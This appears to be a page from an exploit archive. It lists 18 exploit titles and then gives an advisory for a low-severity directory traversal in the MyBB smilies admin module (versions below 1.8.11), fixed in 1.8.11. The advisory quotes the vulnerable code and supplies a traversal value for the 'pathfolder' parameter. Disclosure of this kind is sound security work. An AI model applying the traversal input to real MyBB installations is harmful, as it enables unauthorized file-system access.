
18 new exploits Apple WebKit - 'JSC::B3::Procedure::resetReachability' Use-After-Free Apple WebKit - 'Document::adoptNode' Use-After-Free Apple WebKit - 'JSC::SymbolTableEntry::isWatchable' Heap Buffer Overflow Proxifier for Mac 2.18 - Multiple Vulnerabilities Proxifier for Mac 2.17 / 2.18 - Privesc Escalation Xen - Broken Check in 'memory_exchange()' Permits PV Guest Breakout Quest Privilege Manager 6.0.0 - Arbitrary File Write Adobe Multiple Products - XML Injection File Content Disclosure MyClassifiedScript 5.1 - SQL Injection Social Directory Script 2.0 - SQL Injection FAQ Script 3.1.3 - 'category_id' Parameter SQL Injection WordPress Plugin Spider Event Calendar 1.5.51 - Blind SQL Injection MyBB < 1.8.11 - 'email' MyCode Cross-Site Scripting MyBB smilie Module < 1.8.11 - 'pathfolder' Directory Traversal Brother MFC-J6520DW - Authentication Bypass / Password Change Horde Groupware Webmail 3 / 4 / 5 - Multiple Remote Code Execution Apple WebKit / Safari 10.0.3 (12602.4.8) - Synchronous Page Load Universal Cross-Site Scripting Apple WebKit / Safari 10.0.3 (12602.4.8) - Universal Cross-Site Scripting via a Focus Event and a Link Element
35 lines
No EOL
770 B
Text
Executable file
35 lines
No EOL
770 B
Text
Executable file
Description:
|
|
============
|
|
|
|
product: MyBB
|
|
Homepage: https://mybb.com/
|
|
vulnerable version: < 1.8.11
|
|
Severity: Low risk
|
|
|
|
===============
|
|
|
|
Proof of Concept:
|
|
=============
|
|
|
|
vulnerability address:http://127.0.0.1/mybb_1810/Upload/admin/index.php?module=config-smilies&action=add_multiple
|
|
|
|
vulnerability file directory:/webroot/mybb_1810/Upload/admin/modules/config/smilies.php
|
|
|
|
vulnerability Code:
|
|
|
|
Line 326 $path = $mybb->input['pathfolder'];
|
|
|
|
Line 327 $dir = @opendir(MYBB_ROOT.$path);
|
|
|
|
if we input "pathfolder" to "../../bypass/smile",Directory Traversal success!
|
|
|
|
============
|
|
|
|
Fixed:
|
|
============
|
|
|
|
This vulnerability was fixed in version 1.8.11
|
|
|
|
https://blog.mybb.com/2017/04/04/mybb-1-8-11-merge-system-1-8-11-release/
|
|
|
|
============= |